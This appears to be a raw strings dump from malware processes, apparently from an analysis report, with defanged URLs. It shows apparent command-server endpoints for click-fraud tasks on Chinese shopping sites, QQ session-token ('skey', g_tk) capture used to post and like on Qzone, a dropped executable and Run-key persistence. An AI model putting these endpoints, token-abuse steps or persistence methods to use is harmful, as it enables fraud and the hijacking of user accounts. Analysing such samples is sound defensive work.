hXXp://s.taobao.com/search?q={KEYWORD}&commend=all&ssid=s5-e&search_type=item&sourceId=tb.index&initiative_id=tbindexz_{YMD}
{KEYWORD}
{KEYWORD}
ddd
ddd
-URL{
-URL{
winmm.dll
winmm.dll
DSound.dll
DSound.dll
%s=%s
%s=%s
https
https
hXXp://VVV.taobao.com/webww
hXXp://VVV.taobao.com/webww
hXXp://amos1.taobao.com
hXXp://amos1.taobao.com
hXXp://sighttp.qq.com
hXXp://sighttp.qq.com
hXXp://wpa.qq.com
hXXp://wpa.qq.com
.gov.cn
.gov.cn
.org.cn
.org.cn
.net.cn
.net.cn
.com.cn
.com.cn
!/.vv;'4FUq{}kJ#
!/.vv;'4FUq{}kJ#
.no\B=7wS]
.no\B=7wS]
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoA
HttpQueryInfoA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpSendRequestA
HttpSendRequestA
HttpEndRequestA
HttpEndRequestA
KERNEL32.DLL
KERNEL32.DLL
.The file (%s) aleady exists.
.The file (%s) aleady exists.
OverbearingWeb
OverbearingWeb
OverbearingWeb 1.0
OverbearingWeb 1.0
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
1, 0, 0, 1
TbViewer.EXE
TbViewer.EXE
OverbearingWeb(&A)...
OverbearingWeb(&A)...
OverbearingWeb Microsoft
OverbearingWeb Microsoft
OverbearingWeb
OverbearingWeb
OverbearingWeb.EXE
OverbearingWeb.EXE
OverbearingWeb
OverbearingWeb
svchost.exe_992_rwx_00400000_0002B000:
`.rsrc
`.rsrc
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
ADVAPI32.dll
ADVAPI32.dll
S2_32.dll
S2_32.dll
le32.dll
le32.dll
flow_apikey_xh
flow_apikey_xh
chrome.exe
chrome.exe
hXXp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
hXXp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
{"exec":"getflows","execCount":"8","userid":"%s","userip":"%s"}
{"exec":"getflows","execCount":"8","userid":"%s","userip":"%s"}
parems=%s
parems=%s
task_url":"
task_url":"
{"data":[%s],"code":"%s","src":"%s","datefirst":"%s","exec":"taskcomplete","userid":"%s","version":"%s"}
{"data":[%s],"code":"%s","src":"%s","datefirst":"%s","exec":"taskcomplete","userid":"%s","version":"%s"}
\chrome.exe
\chrome.exe
dwError: %d
dwError: %d
%s%s -URL{%s} -REF{%s} -NAV{%d} -STY{%d} -PXY{%s}
%s%s -URL{%s} -REF{%s} -NAV{%d} -STY{%d} -PXY{%s}
{"task_id":"%s","task_o_id":"%s","task_result":"%s","user_ip":"%s"}
{"task_id":"%s","task_o_id":"%s","task_result":"%s","user_ip":"%s"}
hXXp://VVV.ip138.com
hXXp://VVV.ip138.com
.tmall.com
.tmall.com
.taobao.com
.taobao.com
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; EmbeddedWB 14.52 from: hXXp://VVV.bsalsa.com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Alexa Toolbar)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; EmbeddedWB 14.52 from: hXXp://VVV.bsalsa.com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Alexa Toolbar)
{"userip":"%s","code":"%s","src":"%s","datefirst":"%s","exec":"transfer_clients","userid":"%s"}
{"userip":"%s","code":"%s","src":"%s","datefirst":"%s","exec":"transfer_clients","userid":"%s"}
\\.\PhysicalDrive0
\\.\PhysicalDrive0
iphlpapi.dll
iphlpapi.dll
hXXp://wangbao.6299.cc/xc.txt
hXXp://wangbao.6299.cc/xc.txt
sdfadfwefawCOverbearingWebAppefaefaf
sdfadfwefawCOverbearingWebAppefaefaf
CWebBrowser2
CWebBrowser2
::WriteFile failed ("%s").
::WriteFile failed ("%s").
::GetFileSize failed ("%s").
::GetFileSize failed ("%s").
OpenFile (::CreateFile) failed ("%s").
OpenFile (::CreateFile) failed ("%s").
::HttpEndRequest failed.
::HttpEndRequest failed.
::HttpSendRequestEx failed.
::HttpSendRequestEx failed.
::HttpSendRequest failed.
::HttpSendRequest failed.
::HttpAddRequestHeaders failed.
::HttpAddRequestHeaders failed.
::HttpOpenRequest failed.
::HttpOpenRequest failed.
::HttpQueryInfo failed.
::HttpQueryInfo failed.
The file (%s) aleady exists.
The file (%s) aleady exists.
The encoded URL is not valid.
The encoded URL is not valid.
The port number is not valid.
The port number is not valid.
The requested URL is not a valid URL.
The requested URL is not a valid URL.
HTTP/1.1
HTTP/1.1
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
hXXps://
hXXps://
hXXp://
hXXp://
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
error:%d
error:%d
Mdd
Mdd
Host: %s
Host: %s
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
H SSh
H SSh
MFC42.DLL
MFC42.DLL
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
GetAsyncKeyState
GetAsyncKeyState
USER32.dll
USER32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
urlmon.dll
urlmon.dll
MSVCP60.dll
MSVCP60.dll
WININET.dll
WININET.dll
WINMM.dll
WINMM.dll
VERSION.dll
VERSION.dll
IMAGEHLP.dll
IMAGEHLP.dll
TbViewer.exe
TbViewer.exe
hXXp://auction1.paipai.com/
hXXp://auction1.paipai.com/
.paipai.com
.paipai.com
hXXp://detail.tmall.com/item.htm?
hXXp://detail.tmall.com/item.htm?
hXXp://ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?
hXXp://ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?
hXXp://item.taobao.com/item.htm?
hXXp://item.taobao.com/item.htm?
%d/%d
%d/%d
TbViewer.Document
TbViewer.Document
hXXp://search1.paipai.com/cgi-bin/comm_search1?KeyWord={KEYWORD}&sDefKeyword=&sClassid=0&shoptype=&searchType=0&PTAG=20084.2.2&as=1
hXXp://search1.paipai.com/cgi-bin/comm_search1?KeyWord={KEYWORD}&sDefKeyword=&sClassid=0&shoptype=&searchType=0&PTAG=20084.2.2&as=1
hXXp://s.1688.com/selloffer/offer_search.htm?keywords={KEYWORD}&n=y&categoryId=
hXXp://s.1688.com/selloffer/offer_search.htm?keywords={KEYWORD}&n=y&categoryId=
.1688.com
.1688.com
hXXp://s.taobao.com/search?q={KEYWORD}&commend=all&ssid=s5-e&search_type=item&sourceId=tb.index&initiative_id=tbindexz_{YMD}
hXXp://s.taobao.com/search?q={KEYWORD}&commend=all&ssid=s5-e&search_type=item&sourceId=tb.index&initiative_id=tbindexz_{YMD}
{KEYWORD}
{KEYWORD}
ddd
ddd
-URL{
-URL{
winmm.dll
winmm.dll
DSound.dll
DSound.dll
%s=%s
%s=%s
https
https
hXXp://VVV.taobao.com/webww
hXXp://VVV.taobao.com/webww
hXXp://amos1.taobao.com
hXXp://amos1.taobao.com
hXXp://sighttp.qq.com
hXXp://sighttp.qq.com
hXXp://wpa.qq.com
hXXp://wpa.qq.com
.gov.cn
.gov.cn
.org.cn
.org.cn
.net.cn
.net.cn
.com.cn
.com.cn
!/.vv;'4FUq{}kJ#
!/.vv;'4FUq{}kJ#
.no\B=7wS]
.no\B=7wS]
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoA
HttpQueryInfoA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpSendRequestA
HttpSendRequestA
HttpEndRequestA
HttpEndRequestA
KERNEL32.DLL
KERNEL32.DLL
.The file (%s) aleady exists.
.The file (%s) aleady exists.
OverbearingWeb
OverbearingWeb
OverbearingWeb 1.0
OverbearingWeb 1.0
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
1, 0, 0, 1
TbViewer.EXE
TbViewer.EXE
OverbearingWeb(&A)...
OverbearingWeb(&A)...
OverbearingWeb Microsoft
OverbearingWeb Microsoft
OverbearingWeb
OverbearingWeb
OverbearingWeb.EXE
OverbearingWeb.EXE
OverbearingWeb
OverbearingWeb
RhdmcnkZlr.EXE_1560:
.text
.text
`.data
`.data
.rsrc
.rsrc
MSVBVM60.DLL
MSVBVM60.DLL
#vb6chs.dll
#vb6chs.dll
shdocvw.dll
shdocvw.dll
SHDocVwCtl.WebBrowser
SHDocVwCtl.WebBrowser
WebBrowser
WebBrowser
msscript.ocx
msscript.ocx
MSScriptControlCtl.ScriptControl
MSScriptControlCtl.ScriptControl
%Program Files%\VB
%Program Files%\VB
\VB6.OLB
\VB6.OLB
%System%\ieframe.oca
%System%\ieframe.oca
%System%\msscript.oca
%System%\msscript.oca
%System%\mshtml.tlb
%System%\mshtml.tlb
wininet.dll
wininet.dll
shell32.dll
shell32.dll
UTF8_UrlDecode
UTF8_UrlDecode
VBA6.DLL
VBA6.DLL
dMÂL
dMÂL
hXXp://120.24.81.202/pz.txt
hXXp://120.24.81.202/pz.txt
hXXp://120.24.81.202/pz.html
hXXp://120.24.81.202/pz.html
for(var i = 0, len = str.length; i
for(var i = 0, len = str.length; i
hash = (hash
hash = (hash
hXXp://VVV.baidu.com
hXXp://VVV.baidu.com
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=¶m=u1%3Dhttp%253A%252F%252Fmy.qzone.qq.com/?via=QQCLIENT.MAINPANEL.APPSTORE&ptlang=2052&css=&mibao_css=&low_login=0&ptui_version=10031
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=¶m=u1%3Dhttp%253A%252F%252Fmy.qzone.qq.com/?via=QQCLIENT.MAINPANEL.APPSTORE&ptlang=2052&css=&mibao_css=&low_login=0&ptui_version=10031
loginbtn
loginbtn
skey=
skey=
hXXp://VVV.8kuaiyou.com
hXXp://VVV.8kuaiyou.com
hXXp://open.qzone.qq.com/doLike?g_tk=
hXXp://open.qzone.qq.com/doLike?g_tk=
qzreferrer=http://user.qzone.qq.com/
qzreferrer=http://user.qzone.qq.com/
/&url=http://user.qzone.qq.com/
/&url=http://user.qzone.qq.com/
hXXp://my.qzone.qq.com/app/
hXXp://my.qzone.qq.com/app/
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
hXXp://b1.cnc.qzone.qq.com/cgi-bin/blognew/quote_blog?g_tk=
hXXp://b1.cnc.qzone.qq.com/cgi-bin/blognew/quote_blog?g_tk=
qzreferrer=http://b11.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=
qzreferrer=http://b11.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=
&blogid=
&blogid=
_100.png
_100.png
&type=4&url=hXXp://my.qzone.qq.com/app/
&type=4&url=hXXp://my.qzone.qq.com/app/
&styledm=ctc.qzonestyle.gtimg.cn&imgdm=ctc.qzs.qq.com&bdm=b.qzone.qq.com&mode=2&numperpage=15×tamp=1401962985&dprefix=&blogseed=0.3268083375878632&inCharset=utf-8&outCharset=utf-8&ref=qzone&entertime=1401962991240&ptlang=2052&uin=
&styledm=ctc.qzonestyle.gtimg.cn&imgdm=ctc.qzs.qq.com&bdm=b.qzone.qq.com&mode=2&numperpage=15×tamp=1401962985&dprefix=&blogseed=0.3268083375878632&inCharset=utf-8&outCharset=utf-8&ref=qzone&entertime=1401962991240&ptlang=2052&uin=
&cateName=¸öÈËÈÕ¼Ç&rightType=1&force=0&source=34&iNotice=1&inCharset=gbk&outCharset=gbk&format=fs&ref=qzone&json=1&g_tk=
&cateName=¸öÈËÈÕ¼Ç&rightType=1&force=0&source=34&iNotice=1&inCharset=gbk&outCharset=gbk&format=fs&ref=qzone&json=1&g_tk=
&secverifykey=28Q1206
&secverifykey=28Q1206
hXXp://appsupport.qq.com/cgi-bin/qzapps/userapp_addapp.cgi?g_tk=
hXXp://appsupport.qq.com/cgi-bin/qzapps/userapp_addapp.cgi?g_tk=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareadd_url?g_tk=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareadd_url?g_tk=
&pics=hXXp://i.gtimg.cn/open/app_icon/
&pics=hXXp://i.gtimg.cn/open/app_icon/
.html?via=APPCANVAS.ASSISTANT_SHARE&qzreferrer=hXXp://my.qzone.qq.com/app/
.html?via=APPCANVAS.ASSISTANT_SHARE&qzreferrer=hXXp://my.qzone.qq.com/app/
.html?via=PORTALSTORE.XX.HOME-FRIENDUSED.SEQ3_100141_2&appid=
.html?via=PORTALSTORE.XX.HOME-FRIENDUSED.SEQ3_100141_2&appid=
.html?via=PORTALSTORE.XX.HOME-APPWALL
.html?via=PORTALSTORE.XX.HOME-APPWALL
MSXML2.XMLHTTP
MSXML2.XMLHTTP
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
Mozilla/6.0
Mozilla/6.0
application/x-www-form-urlencoded
application/x-www-form-urlencoded
hXXp://my.qzone.qq.com/app
hXXp://my.qzone.qq.com/app
%Documents and Settings%
%Documents and Settings%
windows xp
windows xp
c:\windows\ime\appfht.exe
c:\windows\ime\appfht.exe
WScript.Shell
WScript.Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
app.exe
app.exe